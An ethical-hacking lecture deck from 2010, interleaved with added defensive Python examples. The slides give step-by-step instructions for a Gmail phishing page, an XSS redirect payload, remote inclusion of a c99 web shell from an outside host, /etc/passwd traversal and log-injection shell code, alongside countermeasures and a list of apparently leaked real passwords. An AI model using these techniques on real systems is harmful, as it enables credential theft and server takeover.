Ethical hacking & Information Security
1. Ethical Hacking & Information Security
An Introduction
AK Dhamija
DIPR, DRDO
May 14, 2010
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 1 / 56
2. Overview
1 Introduction
    Hacker
2 Password Hacking
    Low Tech Methods
    High Tech Methods
    Countermeasures
3 Web Hacking
    Techniques
    Countermeasures
4 Network Hacking
    Techniques
    Countermeasures
5 Windows Hacking
6 Linux Hacking
7 Wireless Hacking
8 Malware
9 References
3-6. Introduction
Computer Security : CIA (Confidentiality, Integrity, Authentication)
• Computer Security
• Network Security
• Information Security
are OXYMORONS
7. Introduction
Hacked Passwords

Top ten most-popular passwords (in that order) from among 32 million hacked from RockYou.com
123456, 12345, 123456789, Password, iloveyou, princess, rockyou, 1234567, 12345678, abc123

Imperva's study of "Consumer Password Worst Practices"
• About 30 percent of users chose passwords of six characters or fewer.
• Moreover, almost 60% of users chose their passwords from a limited set of alpha-numeric characters.
• Nearly 50% of users used names, slang words, dictionary words or trivial passwords (consecutive digits, adjacent keyboard keys, and so on)

Good Password Practices
• It should contain at least eight characters
• It should contain a mix of four different types of characters - upper case letters, lower case letters, numbers, and special characters such as #$%&*,;". If there is only one letter or special character, it should not be either the first or last character in the password.
• It should not be a name, a slang word, or any word in the dictionary. It should not include any part of your name or your e-mail address.
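The practices above can be enforced when a password is set. The following check is an added example, not part of the original slides; the word list is a constructed sample, and `check_password`, its rule names and the 1337-speak folding are assumptions made for illustration.

```python
import string

# Constructed sample list: the RockYou top ten quoted on the slide plus two
# ordinary words. A real check would load a full dictionary / breach list.
WORDLIST = ["123456", "12345", "123456789", "Password", "iloveyou", "princess",
            "rockyou", "1234567", "12345678", "abc123", "cheese", "animal"]

# Fold letters and their common 1337-speak stand-ins onto one symbol, so that
# "animal" and "4n1m41" compare equal ("1" can stand for both "i" and "l").
_SKELETON = str.maketrans({"4": "a", "@": "a", "3": "e", "0": "o", "i": "1",
                           "l": "1", "!": "1", "5": "s", "$": "s", "7": "t"})


def skeleton(text):
    return text.lower().translate(_SKELETON)


_WORD_SKELETONS = {skeleton(w) for w in WORDLIST}


def check_password(pw, full_name="", email=""):
    """Return the slide's rules that `pw` breaks; an empty list means acceptable."""
    problems = []

    # Rule 1: at least eight characters.
    if len(pw) < 8:
        problems.append("too_short")

    # Rule 2: all four character types must be present.
    has_types = (
        any(c.isupper() for c in pw),
        any(c.islower() for c in pw),
        any(c.isdigit() for c in pw),
        any(not c.isalnum() for c in pw),
    )
    if not all(has_types):
        problems.append("missing_types")

    # Rule 2b: a lone letter or lone special character must not be first or last.
    for is_kind in (str.isalpha, lambda c: not c.isalnum()):
        positions = [i for i, c in enumerate(pw) if is_kind(c)]
        if len(positions) == 1 and positions[0] in (0, len(pw) - 1):
            problems.append("edge_char")
            break

    # Rule 3: not a dictionary word, even when padded with digits/symbols
    # ("peter1") or rewritten in 1337 speak ("4n1m41").
    trimmed = pw.strip(string.digits + string.punctuation)
    if {skeleton(pw), skeleton(trimmed)} & _WORD_SKELETONS:
        problems.append("dictionary")

    # Rule 3b: no part (3+ characters) of the user's name or e-mail address.
    personal = "".join(c if c.isalnum() else " "
                       for c in f"{full_name} {email}".lower())
    if any(len(tok) >= 3 and tok in pw.lower() for tok in personal.split()):
        problems.append("personal")

    return problems
```

A check like this only covers the rules listed on the slide; a production policy would also compare candidates against a full breached-password list.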
8. Introduction
Hacked Passwords
Ditalee, Ditalee1, Ditalee3
iambhiku
pareekshanh84
*sha1973******
peter1
hemant
love25786
080176
kingoforkut
iloveyou
9. Introduction Hacker
Hacker

What is a Hacker ?
A hacker is someone who likes to tinker with electronics or computer systems : finding ways to make them do what they do better, or do things they weren't intended to do

Two types of Hacker
• White Hat :
  • Good Guys
  • Don't use their skills for illegal purposes
  • Computer security experts who help protect people from the Black Hats
• Black Hat :
  • Bad Guys
  • Use their skills maliciously for personal gain
  • Hack banks, steal credit cards, and deface websites
10. Introduction Hacker
Hacker Hierarchy
• Script kiddies :
  • Wannabe hackers
  • Have no hacking skills and use the tools developed by other hackers
  • No knowledge of what's happening behind the scenes
• Intermediate hackers :
  • Usually know about computers, networks, and have enough programming knowledge to understand what a script might do
  • Use pre-developed well-known exploits (code that takes advantage of a bug or vulnerability) to carry out attacks
• Elite Hackers :
  • Skilled hackers
  • Write hacker tools and exploits
  • Break into systems and hide their tracks
11. Introduction Hacker
Becoming Hacker

What does it take to become a hacker?
Qualities needed
• Creativity
• Will to learn
• Knowledge is power
• Patience
• Programming to be an elite hacker
12. Password Hacking Low Tech Methods
Old Fashioned Low-Tech Methods

Low-Tech Methods
• Social Engineering
  • Hacker takes advantage of trusting human beings to get information from them
  • e.g. a ploy to install a new security update on your computer
• Shoulder surfing
• Guessing
  • Weak passwords like date of birth, phone number, favorite pet etc
13. Password Hacking High Tech Methods
High Tech Methods
• Gmail system administrator's automatic responder
• Dictionary Attacks
• Brute Force Attacks
• Rainbow Tables
• Phishing
• GX Cookies
• ARP Poisoning
14-16. Password Hacking High Tech Methods
Gmail system administrator's automatic responder
High-Tech Techniques : Gmail system administrator's automatic responder
17. Password Hacking High Tech Methods
Dictionary Attacks

High-Tech Techniques : Dictionary Attacks
• A text file full of commonly used passwords, or a list of every word from the dictionary, is used against a password database
• Brutus, a very common password cracker
18-19. Password Hacking High Tech Methods
Dictionary Attacks

High-Tech Techniques : Dictionary Attacks
IP Masquerading, Anonymous proxy and switching proxies are the techniques used to hide IP
20-21. Password Hacking High Tech Methods
Brute-force Attacks

High-Tech Techniques : Brute-force Attacks
• With time, brute-force attacks can crack any passwords
• Try every possible combination of letters, numbers, and special characters until the right password is found.
22. Password Hacking High Tech Methods
Brute-force Attacks

High-Tech Techniques : Rainbow Tables
• A huge pre-computed list of hash values for every possible combination of characters
• A hash is a one-way function, e.g. MD5
  • "cheese" run through the MD5 algorithm would be fea0f1f6fede90bd0a925b4194deac11
• Having huge tables of every possible character combination hashed is a much better alternative to brute-force cracking
• Once the rainbow tables are created, cracking the password is a hundred times faster than brute-forcing it
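Why precomputation works against unsalted MD5 and stops paying off once every account has its own salt: an added example, not from the original slides. It uses a plain lookup table (the simplest form of precomputation, not a true chained rainbow table), PBKDF2-HMAC-SHA256 as the salted scheme (an assumption, the slides name no scheme), and constructed account data.

```python
import hashlib
import hmac
import os

# Constructed sample data: a tiny candidate list and three accounts, two of
# which share the same password.
WORDLIST = ["cheese", "123456", "iloveyou", "princess", "rockyou"]
ACCOUNTS = {"alice": "cheese", "bob": "cheese", "carol": "iloveyou"}


def md5_hex(password):
    """Unsalted MD5, as on the slide: the same password always gives the same hash."""
    return hashlib.md5(password.encode()).hexdigest()


def pbkdf2_hex(password, salt, iterations=100_000):
    """Salted, deliberately slow hash; the salt is stored next to the result."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()


def verify(password, salt, stored_hex, iterations=100_000):
    """Login check for the salted scheme, using a constant-time comparison."""
    return hmac.compare_digest(pbkdf2_hex(password, salt, iterations), stored_hex)


def recover(stored, table):
    """Look every stored hash up in a precomputed table: one dict access each."""
    return {user: table[h] for user, h in stored.items() if h in table}


def demo():
    # Unsalted: one table, built once, is valid for every account and every dump.
    unsalted = {user: md5_hex(pw) for user, pw in ACCOUNTS.items()}
    md5_table = {md5_hex(word): word for word in WORDLIST}

    # Salted: a table is only valid for the salt it was computed with, so the
    # work has to be redone per account. This table targets alice's salt only.
    salts = {user: os.urandom(16) for user in ACCOUNTS}
    salted = {user: pbkdf2_hex(pw, salts[user]) for user, pw in ACCOUNTS.items()}
    alice_table = {pbkdf2_hex(word, salts["alice"]): word for word in WORDLIST}

    return {
        "md5_recovered": recover(unsalted, md5_table),
        "salted_recovered": recover(salted, alice_table),
        "identical_md5": unsalted["alice"] == unsalted["bob"],
        "identical_salted": salted["alice"] == salted["bob"],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Bob uses the same password as Alice but is not recovered by the table built for Alice's salt. Alice's own weak password still falls to a per-account dictionary run, so salting removes the precomputation advantage but does not rescue a guessable password.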
23. Password Hacking High Tech Methods
Phishing

High-Tech Techniques : Phishing
• Stealing sensitive information, such as usernames, passwords, and bank information, by pretending to be someone you're not
• First the hacker chooses a target (Hotmail and Gmail)
  • Go to www.gmail.com and click File -> Save page as ...
  • Rename ServiceLogin.htm to index.htm
• PHP script that logs and stores your login details when you click "Sign in"
  • Save this script into the same directory as you saved the Gmail page, and name it phish.php
  • Create a new empty text file and name it list.txt
24. Password Hacking High Tech Methods
Phishing

High-Tech Techniques : Phishing
PHP Script
25-26. Password Hacking High Tech Methods
Phishing

High-Tech Techniques : Phishing
• Open up the main Gmail page named index.htm with notepad
• Look for first occurrence of the word "action" in the script
• There are two "action" occurrences in the script so make sure you have the right one by looking at the "form id" name above
• Change the link between action = " " to phish.php. This will make the form submit to your PHP phish script instead of to Google
• After the link you will see the code
• Change the word "POST" to "GET" so that it looks like method="GET". This submits the information you type so that the PHP script can log it
• Save and close the file
• Upload the files up to a free webhost that supports PHP
• Change file permission of "list.txt" to 777
• http://www.yourwebhosturl.com/youraccount/list.txt will give you the username and password
27-28. Password Hacking High Tech Methods
GX Cookies

High-Tech Techniques : GX Cookies
• Cookies are used by web browsers to store your user information so that you can stay logged into a website even after you leave. By stealing your cookie, the attacker can sometimes log in without knowing your password
• When a user logs in to a Gmail account, the Gmail server sends a cookie (a text file) to the browser
• This file helps the Gmail server know that you are authenticated. The cookie keeps you logged in for 2 weeks unless you press sign-out or delete the cookie
• Even if you authenticated using SSL, you are not secure afterwards, because the results returned by the Gmail server travel over an unencrypted connection.
• Every time you request anything from the Gmail server, like an image, your browser sends this cookie file to the Gmail server, and any attacker can easily get this cookie file by using a network sniffer tool
• The attacker then has your Gmail session ID, and using this session ID the attacker can easily log in to your Gmail account without needing any username and password
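An added defender-side check, not from the original slides, for the condition described above: a session cookie issued without the Secure flag travels with every plain-http request, where a sniffer can read it. The response headers are constructed samples; the cookie name GX comes from the slide title, while the values, the finding labels and `audit_response` are assumptions.

```python
from http.cookies import SimpleCookie

# Constructed response headers. Max-Age=1209600 is the two-week lifetime
# mentioned on the slide (14 * 86400 seconds).
WEAK_RESPONSE = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "GX=constructed-session-id; Path=/; Max-Age=1209600"),
]
HARDENED_RESPONSE = [
    ("Content-Type", "text/html"),
    ("Strict-Transport-Security", "max-age=31536000"),
    ("Set-Cookie",
     "GX=constructed-session-id; Path=/; Max-Age=1209600; Secure; HttpOnly"),
]


def audit_response(headers):
    """Return findings for a list of (header name, value) pairs."""
    findings = []

    # Without HSTS the browser may still issue plain-http requests to the site,
    # for example for an image, and attach any non-Secure cookie to them.
    if not any(name.lower() == "strict-transport-security" for name, _ in headers):
        findings.append("no-hsts")

    for name, value in headers:
        if name.lower() != "set-cookie":
            continue
        jar = SimpleCookie()
        jar.load(value)
        for cookie_name, morsel in jar.items():
            max_age = morsel["max-age"]
            days = int(max_age) // 86400 if max_age.isdigit() else 0
            if not morsel["secure"]:
                # The cookie is sent in clear text for its whole lifetime.
                findings.append(f"{cookie_name}:no-secure:{days}d")
            if not morsel["httponly"]:
                # Page scripts can read the cookie (relevant to XSS).
                findings.append(f"{cookie_name}:no-httponly")
    return findings


if __name__ == "__main__":
    print("weak    :", audit_response(WEAK_RESPONSE))
    print("hardened:", audit_response(HARDENED_RESPONSE))
```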
29-30. Password Hacking High Tech Methods
ARP Poisoning

High-Tech Techniques : ARP Poisoning
• Address Resolution Protocol (ARP) is a Layer 2 protocol
• ARP poisoning allows an attacker to sniff data frames on a local area network (LAN), modify the traffic, or stop the traffic altogether
• The aim is to associate the attacker's MAC address with the IP address of another node (such as the default gateway)
• Any traffic meant for that IP address would be mistakenly sent to the attacker instead.
• The attacker could then choose to forward the traffic to the actual default gateway (passive sniffing) or modify the data before forwarding it (man-in-the-middle attack)
• The attacker could also launch a denial-of-service attack against a victim by associating a nonexistent MAC address to the IP address of the victim's default gateway
• ARP spoofing attacks can be run from a compromised host, or from an attacker's machine that is connected directly to the target Ethernet segment
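One way to detect the binding changes described above from passively observed ARP replies (an added example, not from the original slides). The observation format, the addresses and the alert names are constructed for illustration; the pinned gateway entry plays the role of a static ARP binding.

```python
# Constructed observations, one ARP reply per line:
#   <time> <sender IP> <sender MAC>
# 192.0.2.1 is the default gateway in this sample. At 10:03:10 the host that
# owns 192.0.2.30 starts answering for the gateway's address as well.
OBSERVATIONS = """\
10:00:01 192.0.2.1 00:11:22:33:44:55
10:00:02 192.0.2.20 66:77:88:99:aa:bb
10:00:05 192.0.2.30 02:00:00:00:00:30
10:03:10 192.0.2.1 02:00:00:00:00:30
10:03:11 192.0.2.1 02:00:00:00:00:30
10:03:40 192.0.2.20 66:77:88:99:AA:BB
"""


def detect_arp_anomalies(observations, pinned=None):
    """Return (time, kind, ip, mac) alerts for suspicious IP-to-MAC bindings.

    pinned: optional {ip: mac} of known-good bindings (e.g. the gateway).
    """
    pinned = {ip: mac.lower() for ip, mac in (pinned or {}).items()}
    ip_to_mac = {}      # last MAC learned for each IP
    mac_to_ips = {}     # every IP a MAC has claimed
    alerts, seen = [], set()

    def alert(ts, kind, ip, mac):
        if (kind, ip, mac) not in seen:     # report each condition once
            seen.add((kind, ip, mac))
            alerts.append((ts, kind, ip, mac))

    for line in observations.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue                        # skip blank or malformed lines
        ts, ip, mac = fields[0], fields[1], fields[2].lower()

        # A pinned binding must never change; do not learn the new value.
        if ip in pinned and mac != pinned[ip]:
            alert(ts, "pinned_binding_violated", ip, mac)
            continue

        # An IP that moves to a different MAC is the core poisoning symptom.
        if ip in ip_to_mac and ip_to_mac[ip] != mac:
            alert(ts, "binding_changed", ip, mac)
        ip_to_mac[ip] = mac

        # One MAC answering for several IPs suggests it is impersonating a node.
        owners = mac_to_ips.setdefault(mac, set())
        if owners and ip not in owners:
            alert(ts, "mac_claims_second_ip", ip, mac)
        owners.add(ip)
    return alerts


if __name__ == "__main__":
    for a in detect_arp_anomalies(OBSERVATIONS, {"192.0.2.1": "00:11:22:33:44:55"}):
        print(a)
```

Binding changes also have benign causes (a replaced network card, failover pairs, DHCP reassignment), so unpinned alerts need triage, while a violated pinned gateway binding is a strong signal.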
31. Password Hacking Countermeasures
Password Hacking

Countermeasures

Social Engineering
• Ask some questions that he should be able to answer to establish his legitimacy.
• Some professionals study the company before attacking, so they might know all the answers.
• In case of doubt, you should ask the head of whatever department the attacker claims to be from

Shoulder Surfing
• Make sure there is no one behind you attempting to peek
• Don't keep any sticky notes lying around that have your password or password hints on them

Guessing
• Never use a password like your birth date, your mother's maiden name, your pet's name, your spouse's name, or anything that someone may be able to guess

Gmail system administrator's automatic responder
• Don't fall prey to such tactics
• Don't respond to mails, if you can't identify the sender
32. Password Hacking Countermeasures
Password Hacking

Countermeasures

Dictionary Attacks
• Don't use a password that is in the dictionary
• If you use a word from the dictionary but replace most of the letters with a number, you are not safe. A 1337 speak dictionary changes a word like "animal" to 4n1m41
• Use something like doyoulikecheese?88

Brute-force Attacks
• Create a very long password and use many numbers and odd characters
• Creating a phrase for your password is your best option for staying secure

Rainbow Tables
• Creating tables for passwords that are long takes a very long time and a lot of resources

Phishing
• Beware of gmail.randomsite.com, or gamilmail.com
• When you are on the real Gmail website, the URL should begin with www.google.com; anything else is a fake
33. Password Hacking Countermeasures
Password Hacking

Countermeasures

GX Cookies
• Do not use Gmail from public places, cybercafés and public wireless hotspots
• Always use https://mail.google.com because this will access the SSL version of Gmail. It will be persistent over your entire session and not only during authentication

ARP Poisoning
• Static ARP inspection (SARPI) or dynamic ARP inspection (DARPI) approach on switched or hubbed LANs with or without DHCP
• Always use https://mail.google.com because this will access the SSL version of Gmail. It will be persistent over your entire session and not only during authentication
34. Password Hacking Countermeasures
Password Cracking

Other Programs
• Cain and Abel
• John the Ripper
• THC Hydra
• SolarWinds
• RainbowCrack
35. Web Hacking
Web Hacking

Techniques
• Cross Site Scripting (XSS)
• Remote File Inclusion (RFI)
• Local File Inclusion (LFI)
36. Web Hacking Techniques
Web Hacking

Cross Site Scripting (XSS)
• User inputs malicious data into a website
• Affected sites: FBI, CNN, Ebay, Apple, Microsoft, and AOL
• Features commonly vulnerable to XSS attacks are
  • Search Engines
  • Login Forms
  • Comment Fields
• Three types of XSS attacks
  • Local
    • Rarest & hardest to pull off
    • Requires an exploit for a browser
    • Hacker can install worms, spambots, and backdoors onto your computer
  • Non-Persistent
    • Most common type of attack; doesn't harm the actual website
    • A client side script or HTML is inserted into a variable which causes the output that the user sees to be changed
    • Only activated when the user visits the URL crafted by the attacker
  • Persistent
    • Steal website cookies
    • Deface the website
    • Spread Worms
37. Web Hacking Techniques
Cross Site Scripting (XSS)

XSS : How can we say whether the site is vulnerable
• If there is a search field, enter a word and if that word is displayed back to you on the next page, there's a chance it is vulnerable
• Search for <h1>hi</h1>, and if the word "hi" is outputted as a big header, it is vulnerable
• Search for <script>alert("hi");</script>, if the word "hi" pops up in a popup box, then the site is vulnerable to XSS
• These examples are non-persistent. Now if the hacker finds a guestbook etc, he can make it persistent and everyone that visits the page would get the above alert if that was part of his comment

XSS for Phishing
We want to craft a link pointing to the legit website (www.victim-site.com) that redirects to phishing website
• When JavaScript is inserted into the search box, a URL was formed that looked like
• The code we typed into the search box was passed to the "searchbox" variable
• Replace everything in between ?searchbox= and &search with JavaScript code
  <script>window.location = "http://phishing-site.com"</script>
• Now when you go to the finished link, the legitimate site will redirect to the phishing website.
• Encode the URL to make it look more legit - http://www.encodeurl.com/
• It may look something like
  http%3A%2F%2Flocalhost%2Fform.php%3Fsearchbox%3D%3Cscript%3Ewindow.location+%3D+%5C%22http%3A%2F%2Fphishing-site.com%5C%22%3C%2Fscript%3E%26search%3Dsearch%21
• Once the victim sees that the link points to the legitimate website, he will be more likely to fall for the phishing attack
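The probes above stop working once the search term is HTML-encoded before it is echoed. This added example (not from the original slides) renders a hypothetical results page both ways and uses an HTML parser to confirm which tags a browser would actually see; the page layout and all function names are assumptions, while the three probe strings are the ones quoted on the slide.

```python
from html import escape
from html.parser import HTMLParser

# The strings quoted on the slide, used here as regression inputs.
PROBES = [
    '<h1>hi</h1>',
    '<script>alert("hi");</script>',
    '<script>window.location = "http://phishing-site.com"</script>',
]

PAGE = ('<form action="/search"><input name="searchbox"></form>'
        '<p>You searched for: {term}</p>')
EXPECTED_TAGS = ["form", "input", "p"]   # the only tags the template itself emits


def render_unsafe(searchbox):
    """The vulnerable pattern: the parameter is pasted into the markup as-is."""
    return PAGE.format(term=searchbox)


def render_safe(searchbox):
    """The fix: encode <, >, &, and quotes so the input is displayed as text."""
    return PAGE.format(term=escape(searchbox, quote=True))


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(markup):
    """Return the start tags an HTML parser finds, in document order."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def injected_tags(markup):
    """Tags present in the output that the template did not put there."""
    return [t for t in tags_in(markup) if t not in EXPECTED_TAGS]


if __name__ == "__main__":
    for probe in PROBES:
        print("unsafe:", injected_tags(render_unsafe(probe)),
              "| safe:", injected_tags(render_safe(probe)))
```

`injected_tags` can be run against real rendered pages in a test suite to catch a template that starts echoing input without encoding.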
38. Web Hacking Techniques
Remote File Inclusion (RFI)

RFI : How can we say whether the site is vulnerable
• A remote file, usually a shell, is included into a website, which allows the hacker to execute server side commands as the current logged on user, and have access to files on the server
• Many servers are vulnerable to this kind of attack because of PHP's default settings of register_globals and allow_url_fopen being enabled
• PHP 6.0 onwards, register_globals has been deprecated

RFI : Exploiting the vulnerability
• First the hacker would find a website that gets its pages via the PHP include() function and is vulnerable to RFI.
• Many hackers use Google dorks to locate servers vulnerable to RFI.
• A Google dork is the act of using Google's provided search tools to help get a specific search result. e.g. allinurl:.php?page= looks for URLs with .php?page= in them
• To get relevant sites, switch around the word "page" with other letters and similar words
• Hackers usually search vulnerability databases like www.milw0rm.com for already discovered RFI vulnerabilities in site content management systems and search for websites that are running that vulnerable web application with a Google dork
• Websites that include pages have a navigation system similar to: http://target-site.com/index.php?page=PageName
• To see if the page is vulnerable, the hacker would try to include a site instead of PageName, like http://target-site.com/index.php?page=http://google.com
• If the Google homepage shows up on the website, then the hacker knows the website is vulnerable and would continue to include a shell
39. Web Hacking Techniques
Remote File Inclusion (RFI)

RFI : Exploiting the vulnerability
• Most popular shells are c99 and r57. A hacker would either upload them to a remote server or just use a Google dork to locate them already online and insert them (search inurl:c99.txt)
• This will display many websites with the shell already up and ready to be included. At the end of the URL make sure to add a ? so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems.
• The new URL with the shell included would look like http://target-site.com/index.php?page=http://site.com/c99.txt?
• Sometimes the PHP script on the server appends ".php" but "c99.txt.php" would not work.
• To get around this, you would add a null byte (%00) to the end of c99.txt. This tells the server to ignore everything after c99.txt
• If the hacker succeeds in getting the server to parse the shell, he will be presented with a screen
40. Web Hacking Techniques
Remote File Inclusion (RFI)

RFI : Exploiting the vulnerability
• The shell will display information about the remote server and list all the files and directories on it.
• From here the hacker would find a directory that has read and write privileges
• Upload the shell as a .php file so that in case the vulnerability is fixed, he will be able to access it later on
• Root privileges become vulnerable now by uploading and running local exploits against the server
• He could also search the victim server for configuration files. These files may contain usernames and passwords for the MySQL databases etc
41. Web Hacking Techniques
Local File Inclusion (LFI)
LFI : How can we say whether the site is vulnerable
• When you have the ability to browse through the server by means of directory traversal (discover the /etc/passwd file)
• Vulnerable sites are found in a similar way to RFI (www.target-site.com/index.php?p=../../../../../../../etc/passwd)
• /etc/passwd file would display each line as username:passwd:UserID:GroupID:full name:directory:shell
• eg root:x:0:0::/root:/bin/bash
• If the password hash was shown, the hacker would be able to crack it and get access to the machine
• If the password is shadowed and in the /etc/shadow file, which the hacker doesn't have access to, then he may get access to the system through log injection
• The log directories are located in different areas in different Linux distributions (find error.log, access.log, error_log, access_log etc)
LFI : Gaining access to the system through log injection
• Search for the OS version of the target server, then search where the log files are located on that OS
• The hacker would then inject some PHP code into the logs by typing <? passthru($_GET[cmd]) ?> after = in the URL
• This will cause the PHP script to be logged because there is no file by that name. This script will give the hacker shell access and allow him to execute system commands
• If you go back to the log file, you will see that the PHP script wasn't parsed and was instead converted to %3C?%20passthru($_GET[cmd])%20?%3E
• When we submitted the script, the browser automatically encoded the URL. We can use a Perl script that can get around this problem.
42. Web Hacking Techniques
Local File Inclusion (LFI)
LFI : Gaining access to the system through log injection
• Edit the variables: site, path, code, and log to the appropriate information
• Once the hacker runs this script and it goes successfully, he can run any command on the server.
• From here he can run any local exploits to gain root, or just browse the server files
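The request patterns the RFI and LFI slides describe (a URL or ../ sequence in an include parameter, a trailing null byte, a PHP tag that ends up in the log) can be searched for in a web server access log. This Python sketch is an added example, not part of the original presentation; the log lines, addresses and host names are constructed, and the rule names are this example's own.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample lines in Apache access-log style (not from a real server).
SAMPLE_LOG = '''\
203.0.113.5 - - [14/May/2010:10:00:01 +0000] "GET /index.php?page=contact HTTP/1.1" 200 512
203.0.113.9 - - [14/May/2010:10:00:07 +0000] "GET /index.php?page=http://site.example/c99.txt? HTTP/1.1" 200 9120
203.0.113.9 - - [14/May/2010:10:00:09 +0000] "GET /index.php?page=http://site.example/c99.txt%00 HTTP/1.1" 200 9120
203.0.113.9 - - [14/May/2010:10:01:30 +0000] "GET /index.php?p=../../../../../../../etc/passwd HTTP/1.1" 200 1843
203.0.113.9 - - [14/May/2010:10:02:10 +0000] "GET /index.php?p=%3C?%20passthru($_GET[cmd])%20?%3E HTTP/1.1" 404 208
'''

# Client address, request target and status code of one log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')

# One rule per pattern described on the slides, applied to decoded values.
RULES = {
    "remote_include": re.compile(r"^\s*(?:https?|ftp)://", re.I),
    "path_traversal": re.compile(r"\.\.[/\\]"),
    "null_byte": re.compile(r"\x00"),
    "php_tag": re.compile(r"<\?"),
}

def classify(value):
    """Return the sorted names of every rule a parameter value triggers."""
    decoded = unquote(value)  # second decode catches double-encoded input
    return sorted(name for name, rx in RULES.items() if rx.search(decoded))

def scan(log_text):
    """Return (client, parameter, rule names, status) for suspicious requests."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        # Split on the first '?' only: the payload may contain more of them.
        _, _, query = target.partition("?")
        for param, value in parse_qsl(query, keep_blank_values=True):
            labels = classify(value)
            if labels:
                findings.append((client, param, labels, int(status)))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit with a 200 status on an include parameter deserves a closer look than a 404, since the 404 line only shows that the string was written to the log.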
43. Web Hacking Countermeasures
Web Hacking
Countermeasures
• Make sure you are using up-to-date scripts
• Make sure your server's php.ini file has register_globals and allow_url_fopen disabled
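The php.ini check from this slide can be automated. This Python sketch is an added example, not part of the original presentation: both php.ini fragments are constructed, and allow_url_include is an addition to the two directives the slide names (it is the setting that governs URL targets for include and require since PHP 5.2).

```python
import re

# Directives that should be off, mapped to PHP's built-in default, which is
# what applies when php.ini does not set the directive at all.
# register_globals and allow_url_fopen come from the slide; allow_url_include
# is added by this example.
MUST_BE_OFF = {
    "register_globals": "0",
    "allow_url_fopen": "1",
    "allow_url_include": "0",
}
TRUTHY = {"1", "on", "true", "yes"}

# Constructed php.ini fragments (not from a real server).
WEAK_INI = """\
[PHP]
; legacy application settings
register_globals = On
allow_url_fopen = On   ; needed by old news widget
;allow_url_include = Off
"""
HARDENED_INI = """\
[PHP]
register_globals = Off
allow_url_fopen = Off
allow_url_include = Off
"""

# "name = value" up to an optional ';' comment; commented-out lines and
# section headers do not match.
LINE = re.compile(r"^\s*([A-Za-z_][\w.]*)\s*=\s*([^;]*)")

def effective_settings(ini_text):
    """Return the value in force for each audited directive (last one wins)."""
    settings = dict(MUST_BE_OFF)
    for raw in ini_text.splitlines():
        m = LINE.match(raw)
        if m and m.group(1) in settings:
            settings[m.group(1)] = m.group(2).strip().strip("\"'").lower()
    return settings

def audit(ini_text):
    """Return the sorted names of audited directives that are still enabled."""
    return sorted(k for k, v in effective_settings(ini_text).items() if v in TRUTHY)

if __name__ == "__main__":
    print("weak:", audit(WEAK_INI))
    print("hardened:", audit(HARDENED_INI))
```

An empty file is reported as having allow_url_fopen enabled, because that directive defaults to on and has to be switched off explicitly.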
44. Network Hacking
Network Hacking
Techniques
• Foot Printing
• Port Scanning
• Banner Grabbing
• Searching for Vulnerabilities
• Penetrating
45. Network Hacking Techniques
Footprinting
Footprinting
• To hack a system the hacker must first know everything there is to know about it
• Gathering information about a computer system and the companies it belongs to
Footprinting Steps
• A hacker would start gathering information on the target's website. Things to look for are e-mails and names
• Get the IP address of the website
• Ping the server to see if it is up and running
• Do a Whois lookup on the company website. Go to http://whois.domaintools.com and put in the target website
• You see the company e-mails, address, names, when the domain was created, when the domain expires, the domain name servers, and more!
• A hacker can also take advantage of search engines to search sites for data
• "site:www.the-target-site.com" will display every page that Google has of the website
• "site:www.the-target-site.com email" will list several emails that are published on the website
• "inurl:robots.txt" would look for a page called robots.txt, which displays all the directories and pages on the website that they wish to keep anonymous from the search engine spiders
46. Network Hacking Techniques
Port Scanning
Port Scanning
• To detect the services listening on the server's open ports, so as to detect the vulnerabilities
• The Nmap Security Scanner is available for both Mac and Windows users: http://nmap.org/download.html
Port Scanning Steps
• Choose a target and place it in the target box
• Choose the "Profile"
47. Network Hacking Techniques
Port Scanning
Port Scanning Steps
• A sample scan result may look like
• List of some of the most popular ports/services on the internet
• The hacker needs to also find out what operating system the server is running (Visiting a non-existent page gives 404 error page which shows the OS)
48. Network Hacking Techniques
Banner Grabbing
Banner Grabbing
• To find out the software and its version, which is needed to search for vulnerabilities
Banner Grabbing Steps
• Telnet into the service port to figure out the software and version of the service
• If you are using Windows Vista, then telnet is not installed by default. Use Control Panel - Programs and Features - Turn Windows features on or off - Telnet Client to install it
• If you found port 21 (ie ftp) open, then telnet www.targetsite.com 21 to find out the FTP software
• Use Nmap's full version detection option to get this information, if telnet doesn't work
49. Network Hacking Techniques
Searching for Vulnerabilities
Searching for Vulnerabilities
• Search a couple of vulnerability databases for an exploit
• If there's an exploit available, run it against the server and take complete control
• Popular exploit databases are Milw0rm, SecurityFocus, osvdb
• If there isn't any, you can move onto another open port and try again on a different service. Alternatively develop a "0-day" exploit
• No one knows about the vulnerability, hundreds of websites can be hacked before the vulnerability is discovered and patched
• The hacker could sell the vulnerability for thousands of dollars
• It shows that the hacker is very skillful and raises his ranks in the hacker community
Attacks used against discovered vulnerabilities
• Denial-of-Service (DoS): Send a flood of information to the target server causing it to use up all of its resources, and in return pushing it offline, or deny requests to others
• Buffer Overflow (BoF): The extra information overflows into other buffers causing them to be overwritten with malicious code created by the hacker. Once this code is executed, the hacker can receive full control of the server
50. Network Hacking Techniques
Searching for Vulnerabilities
Types of Exploits
• Local Exploit: You must first have access and privileges on the machine. Local exploits are usually used to escalate one's privileges to admin or root
• Remote Exploit: It isn't run locally, but launched from anywhere across the internet
• A hacker usually has to use a combination of both remote and local exploits to gain full control of a system. For example, the hacker may have been able to gain regular privileges with a remote exploit attack, and then be able to escalate to root privileges with the help of a local exploit
51. Network Hacking Techniques
Penetrating
Penetrating
• Running the exploits against the target and penetrating the server
DOS php exploit: http://milw0rm.com/exploits/2901
• Install PHP onto your computer. WAMP is a free web server that comes with PHP
• Paste the PHP exploit into notepad or any word processor and save it as "exploit.php"
